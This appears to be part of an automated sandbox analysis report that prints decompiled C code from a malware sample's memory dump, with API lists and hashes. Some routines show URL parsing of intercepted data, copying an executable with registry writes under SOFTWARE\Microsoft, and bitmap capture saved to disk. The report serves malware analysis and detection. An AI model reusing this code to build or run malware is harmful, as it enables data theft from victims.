    							__eflags = _t152;
    							 *( *0x12dda2c + _t152 + 0x20) = _v96;
    							L16:
    							LeaveCriticalSection(0x12dda14);
    							goto L17;
    						}
    						goto L12;
    					}
    				}
    				SetLastError(0x2f78);
    				_v8 = _v8 & 0x00000000;
    				goto L21;
    			}























    APIs
    • SetLastError.KERNEL32(00002F78,?,?), ref: 012D0D32
    • EnterCriticalSection.KERNEL32(012DDA14), ref: 012D0E0A
    • LeaveCriticalSection.KERNEL32(012DDA14), ref: 012D0EF4
    • EnterCriticalSection.KERNEL32(012DDA14,?,?), ref: 012D0F1A
    • LeaveCriticalSection.KERNEL32(012DDA14), ref: 012D0F61
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CriticalSection$EnterLeave$ErrorLast
    • String ID:
    • API String ID: 486337731-0
    • Opcode ID: 387055cbdda940f7d51bf8aec0d91b33d2bd735a59b3a3a3aead6c1fff65ae6f
    • Instruction ID: 14f6e8eeda1291a46fe696749f378928f96bfbc90e34ba7976a10b6d2ba71332
    • Opcode Fuzzy Hash: 387055cbdda940f7d51bf8aec0d91b33d2bd735a59b3a3a3aead6c1fff65ae6f
    • Instruction Fuzzy Hash: CD813F30A1424ACFCB24DFE4E995AACBBB1FF58314F208169E516AF294DB70D941CF45
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012CD071(int __eax, long __ecx, void* __edx) {
    				struct HWND__* _v8;
    				signed short _v12;
    				int _v16;
    				long _v20;
    				struct tagPOINT _v28;
    				intOrPtr _t46;
    				int _t50;
    				signed int _t51;
    				signed int _t52;
    				signed int _t63;
    				signed int _t64;
    				signed int _t67;
    				signed int _t69;
    				signed int _t70;
    				signed int _t71;
    				int _t73;
    				void* _t74;
    				long _t78;
    				void* _t79;
    				void* _t80;
    				intOrPtr _t81;
    
    				_t80 = __edx;
    				_t73 = __eax;
    				_t78 = __ecx;
    				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
    				_t46 =  *((intOrPtr*)(_t80 + 0x10));
    				_v8 =  *((intOrPtr*)(_t46 + 0x108));
    				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
    				ReleaseMutex( *(_t80 + 0x14));
    				_t50 = GetWindowRect(_v8,  &_v28);
    				if(_t50 != 0) {
    					if(_v12 != 2) {
    						_t51 = _v12 & 0x0000ffff;
    						__eflags = _t51 - 0xd;
    						if(__eflags > 0) {
    							_t52 = _t51 - 0xe;
    							__eflags = _t52;
    							if(_t52 == 0) {
    								_v20 = _t78;
    								goto L22;
    							} else {
    								_t63 = _t52 - 1;
    								__eflags = _t63;
    								if(_t63 == 0) {
    									_v16 = _t73;
    								} else {
    									_t64 = _t63 - 1;
    									__eflags = _t64;
    									if(_t64 == 0) {
    										_v16 = _t73;
    										goto L19;
    									} else {
    										__eflags = _t64 == 1;
    										if(_t64 == 1) {
    											goto L16;
    										}
    									}
    								}
    							}
    						} else {
    							if(__eflags == 0) {
    								L11:
    								_v28.x = _t78;
    								goto L22;
    							} else {
    								_t67 = _t51;
    								__eflags = _t67;
    								if(_t67 == 0) {
    									goto L11;
    								} else {
    									_t69 = _t67;
    									__eflags = _t69;
    									if(_t69 == 0) {
    										L16:
    										_v16 = _t73;
    										goto L17;
    									} else {
    										_t70 = _t69 - 6;
    										__eflags = _t70;
    										if(_t70 == 0) {
    											L19:
    											_v28.x = _t78;
    										} else {
    											_t71 = _t70 - 1;
    											__eflags = _t71;
    											if(_t71 == 0) {
    												L17:
    												_v20 = _t78;
    											} else {
    												__eflags = _t71 == 1;
    												if(_t71 == 1) {
    													L22:
    													_v28.y = _t73;
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					} else {
    						_t81 =  *((intOrPtr*)(_t80 + 0x10));
    						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
    						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
    						_v28.x = _v28.x + _t79;
    						_v28.y = _v28.y + _t74;
    						_v20 = _v20 + _t79;
    						_v16 = _v16 + _t74;
    					}
    					_t50 = IsRectEmpty( &_v28);
    					if(_t50 == 0) {
    						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
    							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
    						}
    						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
    					}
    				}
    				return _t50;
    			}

























    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 012CD085
    • ReleaseMutex.KERNEL32(?), ref: 012CD0A4
    • GetWindowRect.USER32 ref: 012CD0B1
    • IsRectEmpty.USER32(?), ref: 012CD135
    • GetWindowLongW.USER32(?,000000F0), ref: 012CD144
    • GetParent.USER32(?), ref: 012CD15A
    • MapWindowPoints.USER32 ref: 012CD163
    • SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 012CD187
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
    • String ID:
    • API String ID: 2634726239-0
    • Opcode ID: 5536d3843531eb42af8343767700340d31033ee0e91ce2efc55597bee98b2726
    • Instruction ID: 60af0359127666b684e821cb4aa789408c369385eca47ba72e03820335fd85b8
    • Opcode Fuzzy Hash: 5536d3843531eb42af8343767700340d31033ee0e91ce2efc55597bee98b2726
    • Instruction Fuzzy Hash: C3415D71D2020EAFDF219FE8D949ABEBFB4FB44B10F10066EE715A6154D7B09A40CB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E012C4B2F(char* __ecx, signed int __edx) {
    				signed int _t174;
    				signed int _t180;
    				signed int _t181;
    				void* _t188;
    				void* _t196;
    				signed int _t220;
    				signed int _t223;
    				signed int _t228;
    				signed int _t288;
    				intOrPtr* _t295;
    				void* _t298;
    				signed int _t299;
    				intOrPtr _t304;
    				void* _t317;
    				void* _t320;
    				void* _t321;
    				signed int _t322;
    				signed char _t333;
    				signed int _t348;
    				signed int _t349;
    				void* _t355;
    				long _t357;
    				signed short* _t360;
    				signed int _t362;
    				signed short* _t366;
    				signed int _t369;
    				long _t370;
    				void* _t371;
    				long _t372;
    				signed int _t375;
    				void* _t376;
    				void* _t378;
    				void* _t379;
    
    				_t348 = __edx;
    				_t376 = _t378 - 0x6c;
    				_t379 = _t378 - 0x500;
    				_t174 =  *(_t376 + 0x7c);
    				_t357 = 0;
    				 *(_t376 + 0x5c) = __edx;
    				 *(_t376 + 0x38) = __ecx;
    				 *((intOrPtr*)(_t376 + 0x4c)) = 0;
    				if(_t174 <= 0) {
    					L53:
    					asm("sbb eax, eax");
    					return  ~0x00000000;
    				} else {
    					_t295 =  *(_t376 + 0x78) + 0x10;
    					 *((intOrPtr*)(_t376 + 0x64)) = _t295;
    					 *(_t376 + 0x40) = _t174;
    					do {
    						_t302 =  *_t295;
    						_t179 =  *(_t295 - 0x10) >> 0x0000000a & 0x00000008;
    						 *(_t376 + 0x3c) =  *(_t295 - 0x10) >> 0x0000000a & 0x00000008;
    						if( *_t295 == _t357) {
    							L4:
    							_t180 =  *(_t295 + 4);
    							_t304 =  *((intOrPtr*)(_t295 + 8)) + _t180;
    							 *(_t376 + 0x78) = _t357;
    							 *(_t376 + 0x58) = _t357;
    							 *((intOrPtr*)(_t376 + 0x34)) = _t304;
    							if(_t180 >= _t304) {
    								L37:
    								_t181 =  *(_t295 - 0x10);
    								if((_t181 & 0x00000008) != 0 &&  *(_t376 + 0x78) != _t357) {
    									if((_t181 & 0x00000200) == 0) {
    										_t348 = _t348 | 0xffffffff;
    										_t196 = L012B1596( *(_t376 + 0x38), _t348);
    										_t368 = _t196;
    										if(_t196 != _t357) {
    											_t348 = _t376 - 0x34;
    											_t317 = 0xa;
    											L012B1479(_t317, _t348);
    											_push( *(_t376 + 0x78));
    											L012B171C(0xc9, _t368, _t357, _t376 - 0x34, _t368);
    											_t379 = _t379 + 0x18;
    											L012B1933(_t368);
    										}
    									} else {
    										_t369 = 0x3c;
    										_t348 = _t369;
    										L012B19F6(_t376 - 0x3c, _t348);
    										 *((intOrPtr*)(_t376 - 0x2c)) = _t376 - 0x1ac;
    										 *(_t376 - 0x3c) = _t369;
    										 *((intOrPtr*)(_t376 - 0x28)) = 0x103;
    										if(InternetCrackUrlA( *(_t376 + 0x38), _t357, _t357, _t376 - 0x3c) == 1 &&  *((intOrPtr*)(_t376 - 0x28)) > _t357) {
    											GetSystemTime(_t376 + 0x24);
    											_t320 = 9;
    											L012B1479(_t320, _t376 - 0xa0);
    											_push( *(_t376 + 0x2a) & 0x0000ffff);
    											_push( *(_t376 + 0x26) & 0x0000ffff);
    											_push(( *(_t376 + 0x24) & 0x0000ffff) - 0x7d0);
    											L012B1A8C(_t376 - 0x494, 0x104, _t376 - 0xa0, _t376 - 0x1ac);
    											_t379 = _t379 + 0x1c;
    											_push( *(_t376 + 0x58));
    											_push( *(_t376 + 0x78));
    											_t348 = 0;
    											_push(_t376 - 0x494);
    											_t321 = 2;
    											L012B1B86(_t321, 0);
    										}
    									}
    									L012B1933( *(_t376 + 0x78));
    								}
    								if( *(_t295 - 4) != _t357) {
    									if(( *(_t295 - 0x10) & 0x00000010) == 0) {
    										EnterCriticalSection(0x12dd074);
    										L012B1933( *0x12dd08c);
    										L012B1933( *0x12dd090);
    										_t349 = _t348 | 0xffffffff;
    										 *0x12dd08c = L012B12A8( *((intOrPtr*)(_t295 - 0xc)), _t349);
    										_t348 = _t349 | 0xffffffff;
    										 *0x12dd090 = L012B12A8( *(_t295 - 4), _t348);
    										LeaveCriticalSection(0x12dd074);
    									} else {
    										L012B17C6(1, _t376 - 0x60, _t376 - 0xa4);
    										_t188 = L012B1BE0( *(_t295 - 4));
    										_t348 =  *(_t295 - 4);
    										if(L012B173A(_t376 + 0x14, _t348, _t188) != 0) {
    											_push(_t376 - 0xa4);
    											_t355 = 0x10;
    											L012B11DB(_t376 + 0x14, _t355);
    											GetLocalTime(_t376 + 4);
    											_t348 = _t376 - 0x60;
    											L012B1591(0x80000001, _t348, _t376 - 0xa4, 3, _t376 + 4, 0x10);
    										}
    									}
    								}
    								goto L51;
    							} else {
    								goto L7;
    								L11:
    								_t223 =  *_t366 & 0x0000ffff;
    								if(_t223 != 4) {
    									_t37 = _t223 - 4; // -4
    									_t348 = _t37;
    									if(L012B14BF( &(_t366[2]), _t348,  *( *(_t376 + 0x5c)) +  *(_t376 + 0x7c),  *( *(_t376 + 0x74)) -  *(_t376 + 0x7c), _t376 + 0x60, 0,  *(_t376 + 0x3c)) == 0) {
    										goto L35;
    									} else {
    										if( *( *(_t376 + 0x68)) != 4) {
    											 *(_t376 + 0x60) =  *(_t376 + 0x60) +  *(_t376 + 0x7c);
    										} else {
    											 *(_t376 + 0x7c) =  *(_t376 + 0x60);
    										}
    										goto L20;
    									}
    								} else {
    									if( *_t322 != _t223) {
    										_t288 =  *(_t376 + 0x7c);
    									} else {
    										_t288 =  *( *(_t376 + 0x74));
    									}
    									 *(_t376 + 0x60) = _t288;
    									L20:
    									_t228 =  *(_t376 + 0x60) -  *(_t376 + 0x7c);
    									_t333 =  *( *((intOrPtr*)(_t376 + 0x64)) - 0x10);
    									_t298 = ( *_t360 & 0x0000ffff) - 4;
    									 *(_t376 + 0x68) = _t228;
    									if((_t333 & 0x00000004) == 0) {
    										if((_t333 & 0x00000008) != 0) {
    											_t348 = _t228 + _t298 +  *(_t376 + 0x58) + 2;
    											if(L012B1C26(_t376 + 0x78, _t348) != 0) {
    												_t370 =  *(_t376 + 0x58);
    												if(_t298 != 0) {
    													L012B1947( *(_t376 + 0x78) + _t370,  &(_t360[2]), _t298);
    													_t370 = _t370 + _t298;
    												}
    												L012B1947( *(_t376 + 0x78) + _t370,  *( *(_t376 + 0x5c)) +  *(_t376 + 0x7c),  *(_t376 + 0x68));
    												if(( *( *((intOrPtr*)(_t376 + 0x64)) - 0x10) & 0x00000100) == 0) {
    													_t348 =  *(_t376 + 0x68);
    													_t371 = _t370 + L012B13CA(_t370 +  *(_t376 + 0x78), _t348);
    												} else {
    													_t371 = _t370 +  *(_t376 + 0x68);
    												}
    												 *((char*)(_t371 +  *(_t376 + 0x78))) = 0xa;
    												_t372 = _t371 + 1;
    												 *(_t376 + 0x58) = _t372;
    												 *((char*)(_t372 +  *(_t376 + 0x78))) = 0;
    											}
    										}
    										L34:
    										_t295 =  *((intOrPtr*)(_t376 + 0x64));
    										L35:
    										if( *(_t376 + 0x44) <  *((intOrPtr*)(_t376 + 0x34))) {
    											_t180 =  *(_t376 + 0x44);
    											L7:
    											_t366 = ( *_t180 & 0x0000ffff) + _t180;
    											_t360 = _t366 + ( *_t366 & 0x0000ffff);
    											_t322 = _t180;
    											 *(_t376 + 0x44) = _t360 + ( *_t360 & 0x0000ffff);
    											_t220 =  *_t322 & 0x0000ffff;
    											 *(_t376 + 0x68) = _t322;
    											 *(_t376 + 0x50) = _t360;
    											if(_t220 != 4) {
    												goto L9;
    											} else {
    												 *(_t376 + 0x7c) =  *(_t376 + 0x7c) & 0x00000000;
    												goto L11;
    											}
    										}
    										_t357 = 0;
    										goto L37;
    									}
    									_t375 =  *( *(_t376 + 0x74)) - _t228 + _t298;
    									_t362 = L012B1C17(_t375);
    									if(_t362 == 0) {
    										goto L34;
    									}
    									L012B1947(_t362,  *( *(_t376 + 0x5c)),  *(_t376 + 0x7c));
    									L012B1947( *(_t376 + 0x7c) + _t362,  &(( *(_t376 + 0x50))[2]), _t298);
    									L012B1947(_t362 + _t298 +  *(_t376 + 0x7c),  *( *(_t376 + 0x5c)) +  *(_t376 + 0x60),  *( *(_t376 + 0x74)) -  *(_t376 + 0x60));
    									L012B1933( *( *(_t376 + 0x5c)));
    									if(( *( *((intOrPtr*)(_t376 + 0x64)) - 0x10) & 0x00004000) != 0) {
    										_push(0);
    										 *((intOrPtr*)(_t376 + 0x54)) = 0;
    										 *(_t376 + 0x50) = 0;
    										_push(_t376 + 0x50);
    										_push(_t376 + 0x54);
    										_push(_t375);
    										_push(_t362);
    										_t348 = 4;
    										_t299 = _t375;
    										L012B14BF(0x12d8a54, _t348);
    										if( *((intOrPtr*)(_t376 + 0x54)) > 0) {
    											L012B11AE(_t376 - 0x28c);
    											_t348 = _t348 | 0xffffffff;
    											 *((intOrPtr*)(_t376 + 0x48)) = L012B1195(_t376 - 0x288, _t348);
    											_t375 = _t375 + L012B1BE0(_t272) - 4;
    											 *(_t376 + 0x68) = L012B1C17(_t375);
    											L012B1947(_t274, _t362,  *((intOrPtr*)(_t376 + 0x54)));
    											L012B1947( *(_t376 + 0x68) +  *((intOrPtr*)(_t376 + 0x54)),  *((intOrPtr*)(_t376 + 0x48)), L012B1BE0( *((intOrPtr*)(_t376 + 0x48))));
    											L012B1947(L012B1BE0( *((intOrPtr*)(_t376 + 0x48))) +  *(_t376 + 0x68) +  *((intOrPtr*)(_t376 + 0x54)),  *(_t376 + 0x50) + _t362, _t299 -  *(_t376 + 0x50));
    											L012B1933(_t362);
    											_t362 =  *(_t376 + 0x68);
    										}
    									}
    									 *((intOrPtr*)(_t376 + 0x4c)) =  *((intOrPtr*)(_t376 + 0x4c)) + 1;
    									 *( *(_t376 + 0x5c)) = _t362;
    									 *( *(_t376 + 0x74)) = _t375;
    									goto L34;
    								}
    								L9:
    								_t348 = _t220 - 4;
    								if(L012B14BF(_t322 + 4, _t348,  *( *(_t376 + 0x5c)),  *( *(_t376 + 0x74)), 0, _t376 + 0x7c,  *(_t376 + 0x3c)) == 0) {
    									goto L35;
    								} else {
    									_t322 =  *(_t376 + 0x68);
    									goto L11;
    								}
    							}
    						}
    						_t348 =  *( *(_t376 + 0x5c));
    						if(L012B18D4(_t302, _t348,  *( *(_t376 + 0x74)), _t179) == 0) {
    							goto L51;
    						}
    						goto L4;
    						L51:
    						_t295 = _t295 + 0x1c;
    						_t170 = _t376 + 0x40;
    						 *_t170 =  *(_t376 + 0x40) - 1;
    						 *((intOrPtr*)(_t376 + 0x64)) = _t295;
    					} while ( *_t170 != 0);
    					goto L53;
    				}
    			}

    APIs
    • InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 012C4E71
    • GetSystemTime.KERNEL32(?), ref: 012C4E8D
    • GetLocalTime.KERNEL32(?,?,00000000,?), ref: 012C4F85
    • EnterCriticalSection.KERNEL32(012DD074), ref: 012C4FAF
    • LeaveCriticalSection.KERNEL32(012DD074), ref: 012C4FEC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
    • String ID: %ID%
    • API String ID: 2400141425-384985113
    • Opcode ID: be98eeb6ffd9677e73edc2bb407473a88c6966b006be1a37ef4b7a239454f6dc
    • Instruction ID: 33fd2a3c8202b26bbc3e5ea99a689f86f290b1e8f1e0785233a93b178a84a2ff
    • Opcode Fuzzy Hash: be98eeb6ffd9677e73edc2bb407473a88c6966b006be1a37ef4b7a239454f6dc
    • Instruction Fuzzy Hash: DDF17A71A102499FDB24EF68D8A4AEE7BF9FF48740F144219FE1587291DB30E951CB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E012C332A(WCHAR* __ecx, intOrPtr __edx) {
    				long _t66;
    				signed short _t92;
    				signed short _t96;
    				WCHAR* _t120;
    				signed int _t130;
    				signed char _t133;
    				void* _t140;
    				void* _t149;
    				void* _t190;
    				WCHAR* _t198;
    				CHAR* _t201;
    				void* _t205;
    				void* _t207;
    
    				_t205 = _t207 - 0x78;
    				_push(_t130);
    				_t198 = __ecx;
    				 *((intOrPtr*)(_t205 + 0x60)) = __edx;
    				 *((intOrPtr*)(_t205 + 0x70)) = __ecx;
    				 *((char*)(_t205 + 0x76)) = 0;
    				_t66 = GetFileAttributesW(__ecx);
    				_t131 = _t130 | 0xffffffff;
    				if(_t66 == (_t130 | 0xffffffff)) {
    					L012B17E4(_t198, 0);
    				}
    				if(E012C3137(L".exe", _t198, _t205 - 0x3a4, 0) != 0 && E012C3137(0, _t198, _t205 - 0x6b0, 1) != 0) {
    					_push(6);
    					_push(4);
    					_push(_t205 + 0x4c);
    					_push(L"SOFTWARE\\Microsoft");
    					_t140 = 2;
    					if(L012B159B(_t140, 0x80000001) != 0) {
    						L012B19F6(_t205 - 0x19c, 0x1e6);
    						E012B1285(_t205 - 0x198);
    						L012B190B(_t205 - 0x120);
    						L012B1BB3(_t205 - 0x110);
    						 *((intOrPtr*)(_t205 - 0x19c)) = 0x1e6;
    						L012B18B6(_t198);
    						L012B194C(_t131, _t205 - 0xe, 0x14);
    						L012B194C(_t131, _t205 + 6, 0x14);
    						L012B194C(_t131, _t205 + 0x1a, 0xa);
    						 *((intOrPtr*)(_t205 + 0x64)) = _t205 + 0x24;
    						 *((intOrPtr*)(_t205 + 0x68)) = _t205 + 0x2e;
    						 *((intOrPtr*)(_t205 + 0x6c)) = _t205 + 0x38;
    						_t133 = 0;
    						do {
    							_push(9);
    							_t201 =  *(_t205 + 0x64 + (_t133 & 0x000000ff) * 4);
    							_push(4);
    							_t149 = 2;
    							L012B12FD(_t149, _t201);
    							 *(_t205 + 0x77) = 0;
    							if(_t133 != 0) {
    								while(lstrcmpiA( *(_t205 + 0x64 + ( *(_t205 + 0x77) & 0x000000ff) * 4), _t201) != 0) {
    									 *(_t205 + 0x77) =  *(_t205 + 0x77) + 1;
    									if( *(_t205 + 0x77) < _t133) {
    										continue;
    									} else {
    									}
    									goto L11;
    								}
    								_t133 = _t133 - 1;
    								__eflags = _t133;
    							}
    							L11:
    							_t133 = _t133 + 1;
    							_t219 = _t133 - 3;
    						} while (_t133 < 3);
    						_t92 = L012B1AEB(1, 0xffff);
    						 *(_t205 + 0x42) = L012B1AEB(1, 0xffff) & 0x0000ffff | (_t92 & 0x0000ffff) << 0x00000010;
    						_t96 = L012B1AEB(1, 0xffff);
    						 *(_t205 + 0x46) = L012B1AEB(1, 0xffff) & 0x0000ffff | (_t96 & 0x0000ffff) << 0x00000010;
    						L012B16B3(_t205 - 0x854);
    						L012B1947(_t205 - 0x4a8, _t205 - 0x848, 0x102);
    						_push(_t205 - 0x4a8);
    						L012B1271(_t205 - 0x19c, 0x1e6);
    						if(E012C3246(_t219, _t205 - 0x19c, _t205 - 0x3a4, 0) != 0) {
    							if(L012B1302(1,  *((intOrPtr*)(_t205 + 0x70)), _t205 + 0x68, 0, 0) != 0) {
    								 *((intOrPtr*)(_t205 + 0x70)) = L012B1AC3(_t205 + 0x68);
    								L012B1104( *((intOrPtr*)(_t205 + 0x70)), 0xa8c0, _t205 - 0x3a4, 1);
    								L012B1104( *((intOrPtr*)(_t205 + 0x70)), 0xa8c0, _t205 - 0x6b0, 1);
    								_t120 = L012B175D(0xff);
    								_t138 = _t120;
    								lstrcpyW(_t120, _t205 - 0x3a4);
    								_t190 = 0x5c;
    								 *((short*)(L012B1ABE(_t120, _t190) + 2)) = 0;
    								L012B101E(_t120, 6);
    								L012B1104( *((intOrPtr*)(_t205 + 0x70)), 0xa8c0, _t138, 1);
    								L012B1933(_t138);
    							}
    							L012B1947(0x12dca18, _t205 - 0x19c, 0x1e6);
    							L012B164F( *((intOrPtr*)(_t205 + 0x60)), _t205 - 0x3a4, 0xffffffff);
    							 *((char*)(_t205 + 0x76)) = 1;
    						}
    						L012B19F6(_t205 - 0x19c, 0x1e6);
    					}
    				}
    				return  *((intOrPtr*)(_t205 + 0x76));
    			}

    APIs
    • GetFileAttributesW.KERNEL32 ref: 012C3344
    • lstrcmpiA.KERNEL32(?,?,00000004,00000009,?,0000000A,?,00000014,?,00000014,?,SOFTWARE\Microsoft,?,00000004,00000006), ref: 012C3468
      • Part of subcall function 012C3246: lstrcpyW.KERNEL32 ref: 012C3296
    • lstrcpyW.KERNEL32 ref: 012C3585
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: lstrcpy$AttributesFilelstrcmpi
    • String ID: .exe$SOFTWARE\Microsoft$o.d
    • API String ID: 2460131378-3032552628
    • Opcode ID: 6f7a0263f751b3cd783f6cb92a42955d55b403e209b2c8d8d27832d864423106
    • Instruction ID: efcf85ec44a48f401d4d4b87fcf8bf5882fc0b234784f68ebc4c152215b1dfb0
    • Opcode Fuzzy Hash: 6f7a0263f751b3cd783f6cb92a42955d55b403e209b2c8d8d27832d864423106
    • Instruction Fuzzy Hash: 0C713371A202595BDB24EF64ECA0BFE37AAAF55340F104169FB4AD7181DE70DA05CB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E012BA107(WCHAR* __ecx, long __edx, void* _a4) {
    				char _v5;
    				long _v12;
    				WCHAR* _v16;
    				signed int _v20;
    				long _v24;
    				intOrPtr _v30;
    				short _v32;
    				short _v34;
    				intOrPtr _v38;
    				void _v40;
    				signed int _v46;
    				signed int _v48;
    				int _v56;
    				signed int _v60;
    				char _v64;
    				signed int _t61;
    				void* _t78;
    				intOrPtr _t81;
    				long _t84;
    				intOrPtr _t85;
    				void* _t87;
    				signed int _t107;
    				signed int _t118;
    				signed short _t121;
    				int _t126;
    				void* _t127;
    
    				_t118 = __edx;
    				_push( &_v64);
    				_t126 = 0x18;
    				_v12 = __edx;
    				_v16 = __ecx;
    				if(GetObjectW(_a4, _t126, ??) != _t126) {
    					return 0;
    				}
    				_t61 = _v46 * _v48 & 0x0000ffff;
    				if(_t61 != 1) {
    					_t121 = 4;
    					if(_t61 > _t121) {
    						if(_t61 > 8) {
    							_t121 = 0x10;
    							if(_t61 > _t121) {
    								asm("sbb edi, edi");
    								_t121 = (_t121 & 0x00000008) + _t126;
    							}
    						} else {
    							_t121 = 8;
    						}
    					}
    				} else {
    					_t121 = 1;
    				}
    				_v20 = 1;
    				asm("sbb ecx, ecx");
    				_t127 = L012B1C17(( ~(_t121 - _t126 & 0x0000ffff) & 1 << (_t121 & 0x0000ffff) << 0x00000002) + 0x28);
    				if(_t127 != 0) {
    					 *_t127 = 0x28;
    					 *(_t127 + 4) = _v60;
    					 *(_t127 + 8) = _v56;
    					 *((short*)(_t127 + 0xc)) = _v48;
    					 *((short*)(_t127 + 0xe)) = _v46;
    					_t107 = _t121 & 0x0000ffff;
    					asm("cdq");
    					asm("sbb ecx, ecx");
    					 *((intOrPtr*)(_t127 + 0x10)) = 0;
    					 *(_t127 + 0x20) = _t107 & _v20;
    					 *(_t127 + 0x14) = (( *(_t127 + 4) * _t107 + 0x0000001f & 0xffffffe0) + (_t118 & 0x00000007) >> 3) *  *(_t127 + 8);
    					 *((intOrPtr*)(_t127 + 0x18)) = 0;
    					 *((intOrPtr*)(_t127 + 0x1c)) = 0;
    					 *((intOrPtr*)(_t127 + 0x24)) = 0;
    					_v5 = 0;
    					_t78 = L012B1C17((( *(_t127 + 4) * _t107 + 0x0000001f & 0xffffffe0) + (_t118 & 0x00000007) >> 3) *  *(_t127 + 8));
    					_v20 = _t78;
    					if(_t78 != 0 && GetDIBits(_v12, _a4, 0,  *(_t127 + 8), _t78, _t127, 0) > 0) {
    						_t84 = 0x28 +  *(_t127 + 0x20) * 4;
    						_v24 = _t84;
    						_v40 = 0x4d42;
    						_t85 = _t84 + 0xe;
    						_v30 = _t85;
    						_v38 =  *(_t127 + 0x14) + _t85;
    						_v34 = 0;
    						_v32 = 0;
    						_t87 = CreateFileW(_v16, 0x40000000, 1, 0, 2, 0x80, 0);
    						_a4 = _t87;
    						if(_t87 != 0xffffffff) {
    							if(WriteFile(_t87,  &_v40, 0xe,  &_v12, 0) != 0 && WriteFile(_a4, _t127, _v24,  &_v12, 0) != 0 && WriteFile(_a4, _v20,  *(_t127 + 0x14),  &_v12, 0) != 0) {
    								_v5 = 1;
    							}
    							CloseHandle(_a4);
    							if(_v5 == 0) {
    								L012B1640(_v16);
    							}
    						}
    					}
    					L012B1933(_v20);
    					L012B1933(_t127);
    					_t81 = _v5;
    				} else {
    					_t81 = 0;
    				}
    				return _t81;
    			}

    APIs
    • GetObjectW.GDI32(?,00000018,?), ref: 012BA11F
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
